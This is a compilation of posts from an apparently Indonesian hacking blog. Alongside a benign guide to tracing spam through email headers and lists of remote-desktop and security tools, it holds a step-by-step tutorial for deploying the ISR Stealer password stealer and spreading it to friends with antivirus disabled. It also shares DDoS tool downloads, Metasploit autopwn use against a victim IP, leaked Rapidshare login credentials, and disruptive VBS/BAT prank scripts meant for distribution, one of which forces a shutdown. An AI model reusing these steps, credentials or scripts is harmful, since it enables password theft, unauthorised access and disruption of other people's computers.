BACKTRACKING E-MAIL

.
Ask most people how they determine who sent them an email message and the response is almost universally, “By the From line.” Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The “From” header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the “From” header is forged.


So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I’ve changed my email address and the name of my server for obvious reasons. I’ve also double spaced the headers to make them more readable.

Return-Path: < s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])

by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7

for < davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31  0200

Message-ID:

From: “Maricela Paulson” < s359dyxtt@yahoo.com>

Reply-To: “Maricela Paulson” < s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels…isha

Date: Sun, 16 Nov 2003 19:42:31  0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary=”MIMEStream=_0 211404_90873633350646_4032088448″

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn’t come from yahoo’s email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here’s is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)

12.0.0.0 – 12.255.255.255

Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)

12.218.168.0 – 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN’s WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost

Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com

Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom’s web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host’s IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

SURAT CINTA SEORANG HACKER

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.
Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku! Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

BEBERAPA TOOLS BUAT PERANG

1.Supernova V5 DDos Tool ( VIP )

download di sini

2.DoS 5.5 Annihiliation Edition
 Download di sini

3.LFIntruder (lfi scanner)
 
 Download di sini


4.MD5Search v1.8

Download di sini

 dah sekian dari saya see u

PHOTOSHOP CS5 PORTABLE



Kemarin sempet nyari-nyari software photoshop 5 portable, dan akhirnya ketemu. Kebetulan saya harus menyelesaikan desain dan butuh photoshop. Sebagaimana kita ketahui photoshop merupakan software yang sering digunakan untuk desain grafis. Fitur-fitur yang dimilikinya cukup bagus dan mudah digunakan.
Photoshop portable bisa digunakan tanpa perlu instalasi, tinggal di jalankan saja file aplikasinya. Untuk  file yang akan di download nanti berukuran sekitar 60 MB-an dan setelah di download dan kemudian di extract maka ukurannya sekitar 300MB –an.

download adobe photoshop CS5 portable di sini

SOFTWARE PENGUSIR NYAMUK

Kadang menyebalkan kalau kita sedang konsentrasi kerja di depan komputer, tiba-tiba nyamuk mengganggu kita. Cara yang umum orang pakai biasanya menggunakan obat nyamuk baik itu obat nyamuk bakar, elektrik ataupun lotion. Nah, jika anda kurang menyukai cara-cara tersebut anda bisa mencoba menggunakan software Antimosquito.

Antimosquito adalah sebuah software portabel yang bisa digunakan untuk mengusir nyamuk. bagaimana sistem kerjanya. Ketika software ini dijalankan ia akan menghasilkan frekuensi 16000Hz-20000Hz. frekuensi ini dapat dideteksi oleh nyamuk dan beberapa hewan. Mereka merasa terganggu dengan frekuensi ini dan mereka biasanya menjauhi  sumber frekuensi ini. Manusia tidak akan terganggu karena tidak mampu mendengar frekuensi ini.




download Antimosquito di sini

TUTORIAL HACKING PIC FACEBOOK .etc

saya akan memberikan sedikit tutorial buat nge hack semoga bermanfaat bismillah

pertama. download tools nya ISR stealer unduh skrg : di sini


ok jika sudah ini tools akan mencuri semua password dan email
seperti pada yahoo mozilla chrome dsb
log nya menggunakan hph url mungkin buat newbi seperti saya dulu ga tau bagaimana tp akhir nya skrg bisa
liat langkah2 setting up nya

1.register di free webhost : http://members.000webhost.com/login.php jika merasa kesulitan log in anda tulis d google 000webhost members area liat screen :

2.sekarang anda masuk ke mysql liat screen :

3. lanjut kita membuat sql database / register databse : sccren :


4 .anda sett configuration php temukan dalam folder ISR stealer jika sudah menemukan edit seperti ini . screen :



. nb log in detail harus d ingat buat log in liat hasil

5 .jika sudah skrg back to cppanel dan masuk ke file manager screen :


6 .masuk ke public html liat


7 . upload kan semua dalam php folder . liat screen :


screen 2 :


checlist terus tanda back pilih 8 .centong / beri tanda index.php default.php config.php dan isntal.php jika sudah press chmod liat screen


9.jika sudah km akan melihat screen ini


tandai semua yg kosong jangan disisakan jika sudah press tanda checlist terus klik back

10 .selanjut nya klik kanan open dalam instal php :
11. km instal d bawah nya ad bacaan instal nnti akan keluar
      jika sudah anda kembali ke


delete instal php nya 12 jika sudah ada index.php klik kanan / open liat screen :


maka anda akan terlihat gambar seperti ini :

jadilah buat database log nya buat masuk kesana user name dan password ada pada anda pertama setting configuration


untuk menggunakan nya



buka tool yg td anda download dalam php url nya sama anda ganti link nya link yg brusan anda buka / klik kanan dalam index.php yg hasil nya seperti ini :



itu kan d atas ad link simpan dalam ISR stealer

tuh gantikan php url nya


terus anda test kl sudah build ..jdilah server nah itu dia kirim2kan ke teman2 maka anda akan dapat membaca semua password



NB server yg anda build akan k detect virus matikan lah terlebih dahulu

semoga bermanfaat....

FREE REMOTE DESKTOP GREATNESS


 Berikut adalah beberapa layanan Remote Desktop Gratis yang tersedia di Internet. Masing-masing memiliki karakteristik serta fitur yang berbeda. Beberapa di antaranya merupakan layanan berbasis web di mana kita harus terlebih dahulu mendaftar dan melakukan instalasi satu program kecil, ada pula yang bersifat stand alone sehingga mengakses komputer dapat dilakukan lewat jalur VPN. Selain itu ada pula yang berkemampuan untuk berbagi layar desktop bagi lengkap dengan fasilitas chat dan VOIP yang biasanya berguna untuk melakukan pelatihan atau presentasi jarak jauh dan bahkan ada pula yang memungkinkan kita untuk melakukan remote desktop melalui handphone atau PDA.

1.Yuugu
Menggunakan Yuuguu untuk berbagi layar desktop via Web, anda dapat meminta peserta untuk berbagi kontrol layar dan bekerja sama secara real time melalui web. Sangat membantu untuk bekerja sama menyuntung sebuah dokumen, mempercepat proses pembuatan dokumen dan presentasi secara online.

2.LogMeIn
Cukup instal LogMeIn pada komputer yang ingin diakses dan kita akan dapat melakukan remote terhadap PC atau Mac dari mana saja hanya menggunakan sebuah browser. Apapun dapat dilakukan seolah-olah secara fisik berada di depan PC atau Mac yang sedang di remote.

3.CrossLoop
CrossLoop memungkinkan kita untuk melihat layar, kendali atas mouse dan keyboard pada komputer remote. Dalam promosinya CrossLoop dapat dijalankan dalam waktu kurang dari 2 menit. Cukup download dan instal aplikasi dan akan secara otomatis mengkonfigurasi sendiri untuk lingkungan jaringan komputer anda.

4.ShowMyPC
ShowMyPC memungkinkan kita untuk berkolaborasi dalam melakukan Remote Desktop. Cocok sebagai alternatif untuk yang Anda yang sudah biasa menggunakan WebEx atau Gotomypc. Beberapa kelebihannya antara lain gratis, tidak perlu instalasi, pendaftaran, tidak perlu login. Juga memiliki fitur chatting, White-Board dan mampu merekam layar. Dibangun menggunakan standar SSH VNC serta menyediakan layanan Premium Hosting.

5.SkyFex
Menggunakan SkyFex Remote Assitant memungkinkan kita menyaksikan dan mengakses komputer dari jauh secara real time. Skyfex tidak memerlukan tambahan software dan bekerja melalui proxy, firewall atau NAT pada jaringan. SkyFex adalah layanan berbasis Windows dan membutuhkan Internet Explorer.

6.TeamViewer
Selain dapat melakukan remote desktop, TeamViewer dilengkapi dengan fitur transfer file yang memungkinkan kita menyalin file dan folder dari dan ke komputer yang sedang diakses.

Untuk memasang TeamViewer tidak diperlukan hak Administrator. Cukup jalankan software dan jangan lupa untuk mematikannya setelah selesai. Jika menggunakan TeamViewer tidak perlu khawatir tentang firewall karena TeamViewer akan menemukan cara komunikasi secara otomatis. Untuk penggunaan non-komersial tersedia secara gratis.

7.Gooer
Pertama kita harus mengunduh dan menginstal Gooer pada semua komputer yang ingin diakses. Setelah itu komputer dapat diakses menggunakan PC atau perangkat Mobile. Pengguna PC bisa menggunakan sebuah browser (IE, Firefox atau web browser lain yang mendukung Java) sedangkan pengguna mobile dapat mengunjungi wap.gooer.com untuk mendapatkan aplikasi berbasis Java yang tersedia untuk klien perangkat Mobiles/PDA.

Jika ingin mengakses remote komputer melalui ponsel atau PDA, Anda harus memasang di atas Gooer Host Software PC ke host pertama, setelah itu Anda dapat men-download software ini, Anda kirimkan ke perangkat mobile dan menginstalnya.

8.Microsoft SharedView
Untuk memulai sesi program ini Anda harus terlebih dahulu sign in menggunakan Windows Live ID. Jika Anda ingin memulai sesi dan tidak memiliki Windows Live ID, Anda dapat menginstalas program ini namun sebelum masuk, Anda tetap memiliki Windows Live ID.

9.Yakkle
Yakkle dibangun menggunakan platform Java. Fungsi remote desktop sharing sebenarnya hanya salah satu fitur yang tersedia selain Instant Messaging, File Sharing, Video dan Conference. Yakkle dapat saling berkomunikasi dengan Gmail serta Jabber. Yakkle juga mampu berintegrasi dengan account Twitter.

10.DimDim
Dimdim Web Meeting tersedia dalam edisi open source maupun komersiil yang mampu mendukung ribuan peserta. Tidak seperti layanan web meeting sebelumnya, Dimdim tersedia secara online atau kita juga dapat menginstalnya di server pribadi.

11.Desktra
Untuk menggunakan DESKTRA, unduh dulu file "FreedomSetup1_1.exe", instal pada PC yang ingin diakses dari internet. PC ini disebut "HOST". Windows perlu reboot untuk menyelesaikan instalasi. Setelah reboot gunakan akun yang sama saat meng-install DESKTRA untuk melanjutkan proses instalasi.

PC tersebut akan dipromosikan dengan DESKTRA Freedom Desktop Server Control Panel. ID baru otomatis dibuat ketika "DESKTRA Freedom Server.exe" berjalan untuk pertama kalinya. Isi password yang Anda inginkan dan klik tombol "Start" untuk memulainya.

12.Remobo
Beberapa keunggulan yang dimilikinya:
* Zero-Configuration: instal dan Anda siap digunakan! Tidak perlu konfigurasi yang rumit mengubah setting jaringan, ataupun firewall untuk memulainya.
* Mudah pakai: akses komputer dari manapun selama dalam dalam daftar Anda dunia!
* Aman: semua data dienkripsi dan private agar tidak ada orang lain dapat melihatnya. Tentu saja NO spyware atau adware apapun!
* Cepat: Remobo akan mencoba untuk membuat koneksi secara langsung atau peer-to-peer antara komputer untuk mendapatkan kecepatan terbaik.
* Fleksibel: dilengkapi dengan akses remote desktop, file sharing & VPN.


HACKING WITH MNAP & METASPOLIT

First download Metasploit 3.3 From Legal Site, Link:http://www.metasploit.com/
Silahkan anda install, dan menjelang akhir install akan menanyakan apakah Anda ingin install nmap juga? pilih Yes
setelah anda menginstal akan ada tampilan sebagai di bawah ini
 
 
kemudan ketik "db_create" tanpa menggunakan tanda petik Sekali lagi anda mengetik type nmap. Load nmap seperti gambar berikut ini:


Anda perlu mengkonfigurasi scan sekarang
Biasanya saya lakukan sederhana-sT-sV scan yang akan kami kirim port yang terbuka dan layanan yang berjalan pada komputer korban, Sekarang ketik nmap-sT-sV xxx.xxx.xxx.x (X menjadi korban nomor Ip), seperti di bawah ini.


Sekarang berikan 5 menit untuk menyelesaikan scan, Setelah lengkap jika Anda beruntung, Anda harus mendapatkan respon seperti ini ...
 
 

Pada dasarnya ini adalah daftar port yang terbuka dan layanan yang berjalan pada mesin target, Sekarang fitur berguna dari 3,3 metasploit kerangka adalah fitur autopwn, pada dasarnya ini pencarian dan menjalankan semua sesuai eksploitasi dalam database Metasploit terhadap mesin target dan jika berhasil akan menciptakan sebuah shell atau hak serupa bagi attacker
Sekarang setelah Anda memiliki hasil nmap dikirim kembali kepada Anda menunjukkan port yang terbuka dan jenis layanan db_autopwn-p-t-e, Dari titik ini, Anda juga akan memiliki akses ke komputer korban melalui diluncurkan dengan sukses mengeksploitasi atau Anda akan mendapat jawaban mesin tidak rentan atas eksploitasi di Metasploit database. Sayangnya pada mesin khusus ini saya menemukan itu tidak rentan seperti gambar di bawah ini.
GOOD LUCK

AKSES PREMIUM ACCOUNT IN RAPIDSHARE

Mendapatkan Akses Premium Account di Rapidshare
Rapidshare[dot]de, situs penyedia layanan upload dan free download file, alternatif bagi para netter yang ingin tukar-menukar file. Cukup gunakan fasilitas upload berbasis web yang telah disediakan, catat alamat url file anda dan anda bisa mendownloadnya dari manapun lain waktu atau bagikan alamat url tersebut ke teman-teman anda jika anda ingin mereka juga “menikmati” file yang telah anda upload.
Ada 2 account yang ditawarkan oleh Rapidshare, yaitu Premium account dan Free Account. Masalahnya adalah pada Free account. User akan terganggu dengan adanya counter time. Counter time ini biasanya bisa mencapai lebih dari 1 menit. Jadi, rapidshare akan membuat anda menunggu selama kurang lebih satu menit sebelum menunjukkan url file yang nada minta. Huh.. cukup menyita waktu bukan?
Masalah kedua adalah Rapidshare akan mencatat alamat IP anda dan memberikan batasan untuk melakukan download.
Masalah ketiga, manusia selalu saja merasa kurang puas. Ketika dia sudah mendapatkan akses yang setara dengan premium account, dia akan berfikir, “gimana yach biar gue benr-bener dapet premium account”. Okay, di artikel ini juga saya akan mewujudkan impian itu.
Sekarang, mari kita bahas ketiga masalah itu satu persatu.
:::::: Alat perang Kita ::::::
>> Seperangkat komputer dan koneksi internet ^_^
>> keberanian dan semangat yang tinggi Smile
>> Browser Mozilla Firefox
I. Melewati Conter Time
————————-
1. Copy-paste alamat (URL) file yang hendak anda download di address bar Mozilla.
2. Setelah halaman Rapidshare muncul, klik Free account.
3. Akan muncul counter down, abaikan saja, hapus string url di address bar anda hingga bersih, kemudian ketik kode java script berikut: javascript:alert(c=0)
4. Tekan ENTER, akan muncul sebuah message box di hadapan anda, tenang, jangan panik, tetap fokus dan bersabar ^_^ tekan saja [OK] dengan penuh percaya diri, counter down akan segera lenyap dari hadapan anda dan rapidshare akan menampilkan link download file yang ingin anda download.
II. Mengatasi Limit Download
——————————
Caranya simple, gunakan saja kumpulan proxy yang sudah diposting di www.spyrozone.tk halaman Artikel&Trik kategori komputer. Pilih sendiri dari ratusan proxy itu Smile
III. Benar-Benar Mendapatkan akses Premium Account
————————————————–
Jika kedua cara yang telah saya bahas hanya akan memberikan anda akses “setara” dengan premium account, kini anda akan benar-benar mendapatkan premium account! Gunakan saja User name dan password berikut:
LOGIN: 31989
PASSWORD: 2310214
LOGIN: 27766
PASSWORD: 8797341
User: 18549
Password: 4646182
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043
LOGIN: 20949
PASSWORD: 2716739
User: 22484
Password: 358030
User: 18549
Password: 4646182
User: 18800
Password: 9496722
LOGIN: 20949
PASSWORD: 2716739
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043
PENTING :
Gunakan trik dan account yang telah saya berikan untuk mendownload file-file yang bermanfaat. Sudah bukan jamannya lagi keterbatasan membatasi kita untuk belajar. Keep Learning and happy hacking..

ISENG VBS FILE

1. Iseng Mengeject CD-Drive Terus Menerus

Quote:Set oWMP = CreateObject(�WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count � 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count � 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Kemudian save dengan �HN.VBS� & sebarkan..

2. Iseng Dengan Tombol Enter Terus Menerus

Quote:Set wshShell = wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �~(enter)�
loop

Kemudian save dengan �HN.VBS� & sebarkan..

3. Iseng Dengan Pesan Lambat Notepad �Hello, how are you? I am good thanks!�

Quote:WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(�WScript.Shell�)
WshShell.Run �notepad�
WScript.Sleep 100
WshShell.AppActivate �Notepad�
WScript.Sleep 500
WshShell.SendKeys �Hel�
WScript.Sleep 500
WshShell.SendKeys �lo �
WScript.Sleep 500
WshShell.SendKeys �, ho�
WScript.Sleep 500
WshShell.SendKeys �w a�
WScript.Sleep 500
WshShell.SendKeys �re �
WScript.Sleep 500
WshShell.SendKeys �you�
WScript.Sleep 500
WshShell.SendKeys �? �
WScript.Sleep 500
WshShell.SendKeys �I a�
WScript.Sleep 500
WshShell.SendKeys �m g�
WScript.Sleep 500
WshShell.SendKeys �ood�
WScript.Sleep 500
WshShell.SendKeys � th�
WScript.Sleep 500
WshShell.SendKeys �ank�
WScript.Sleep 500
WshShell.SendKeys �s! �

Kemudian save dengan �HN.VBS� & sebarkan..
4. Iseng Dengan Backspace

Quote:MsgBox �Maaf, Anda Harus Mengulang Kembali�
Set wshShell =wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �{bs}�
loop

Kemudian save dengan �HN.VBS� & sebarkan..
5. Iseng Dengan Membuka Calculator Terus Menerus

Quote:@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top

Kemudian save dengan �HN.BAT� & sebarkan..

6. Iseng Dengan Keyboard

Quote:Set wshShell = wscript.CreateObject(�WScript.Shell�)
do
wscript.sleep 100
wshshell.sendkeys �Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki�
loop

Kemudian save dengan �HN.VBS� & sebarkan..

7. Iseng Dengan Shutdown Computer

Quote:@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c �Error! Virus Menyebar Keseluruh System!� -s -t 0

Kemudian save dengan �HN.BAT� & sebarkan..

10 TOOLS FAVORIT HACKER

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.
Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di http://www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di http://www.snort.org.

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.
Fitur yang terdapat pada Netcat antara lain :
• Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
• Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
• Port scanner, untuk mendeteksi port yang terbuka.
• Buffered send-mode dan hexdump RFC854 telnet.
6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monito...pdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.
“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. http://www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X, dan Linux. http://www.wireshark.org
Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

ABOUT ME




Nama : Abdul Munier

Jenis Kelamin : Laki-Laki

Tempat Tinggal Sekarang : Cengkareng , Jakarta Barat Tepatnya di Kayu besar
    
Bahasa : Indonesia , English

 
Activitie : Teknologi Informasi, Twitter, Research, Love, Technology, Spending Other Peoples Money, Flirting, Facebooking, Blogging
 
Interests : Wanita tentunya , V for Vendeta , Research, Databases and CMS's, Searching Loopholes, Hacking webservers, Defacing Websites, Exploits, Spoofing, Social engineering, Reverse engineering, DoS attacks, SQL injection, Pen Testing
 
  
Kenapa Gua namain blog ini "FVCK SACENK" karena jujur gua bersekolah di SMK 1 CENGKARENG ,
Buat Pembaca yang kebetulan pernah sekolah di SACENK jangan marah yaa namanya juga BLOG . kata William shakespeare "APALAH ARTI SEBUAH NAMA" hahahah .

KODE RAHASIA HANDPHONE

Berikut terdapat kode-kode rahasia pada GSM nokia, sony ericson, Samsung,Motorola ,Philips, LG,Benq-Siemens, panasonic dan alcatel.
Tetapi ada beberapa kode yang hanya bisa dipakai oleh ponsel tertentu saja.

Nokia
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#7370# atau *#RESO# Mereset ke setingan awal (pabrikan), data-data akan terhapus.
3. *#7780# atau *#rst0* Mereset ke setingan awal (pabrikan), data-data tidak akan terhapus.
4. *#0000# Menampilkan versi firmware.
5. *#9999# Merupakan alternatif jika kode *#0000# tidak berfungsi.
6. *#8110# Menampilkan versi firmware (Nokia 8110).
7. *#21# Melihat pengalihan untuk semua panggilan ‘All calls’.
8. **21*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan.
9. **61*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab.
10. **67*nomor tujuan# Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika sedang sibuk.
11. *#61# Melihat nomor pengalihan karena tidak dijawab ‘Call divert’.
12. *#62# Melihat nomor pengalihan karena diluar jangkauan ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
13. *#67# Melihat nomor pengalihan karena sibuk ‘Call divert’ dan mengetahui kemana nomor tersebut dialihkan.
14. *#2820# Menampilkan alamat IP Bluetooth.
15. *#30# Menampilkan nomor pribadi.
16. *#43# Melihat status ‘Call waiting’.
17. *#62209526# atau *#MACOWLAN Menampilkan alamat MAC WLAN.
18. *#67705646# Mengganti operator logo (tipe 3310, 3330).
19. *#73# Mereset timer ponsel dan skor game.
20. *#746025625# Menampilkan status SIM Clock. Jika ponsel anda mendukung fungsi power saving akan muncul tulisan “SIM Clock Stop Allowed”, itu berarti anda bisa mendapatkan waktu terbaik untuk standby.
21. *#7760# Menampilkan kode pabrik/produk.
22. *#92702689# atau *#war0anty# Menampilkan nomor serial, tanggal pembuatan, tanggal pembelian, tanggal terakhir servis (000 jika belum pernah diperbaiki) dan transfer user data. Pada beberapa ponsel setelah menggunakan kode ini anda harus merestart ponsel.
23. *#2640# Menampilkan kode pengamanan ponsel.
24. *#3370# Mengaktifkan EFR (Full Rate Codec), kualitas suara terbaik namun pemakaian baterai menjadi boros.
25. #3370# Untuk menonaktifkan EFR.
26. *#4720# Mengaktifkan Half Rate Codec, kualitas suara terendah namun pemakaian baterai menjadi lebih hemat.
27. #4720# Untuk menonaktifkan Half Rate Codec.
28. 10# Cara cepat untuk membuka nomor kontak yang tersimpan di kartu SIM berdasarkan nomor urut. Contoh angka 10 adalah nomor urut kontak.
29. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
30. #pw+1234567890+1# Mengunci status provider, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
31. #pw+1234567890+2# Mengunci status network, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
32. #pw+1234567890+3# Mengunci status country, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”.
33. #pw+1234567890+4# Mengunci status kartu SIM, gunakan tanda “*” untuk memisahkan antara “p,w” dan tanda “+”

Sony Ericsson
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# atau 0000 Mereset kembali ke bahasa inggris.
3. >*<<*<* Melihat service menu dan versi software. Tekan tombol Yes berulang kali untuk melihat semua data software dan tekan > untuk melihat semua teks yang terdapat pada ponsel.
4. <**<> 4. *#337*# Mengaktifkan/menonaktifkan

EFR.
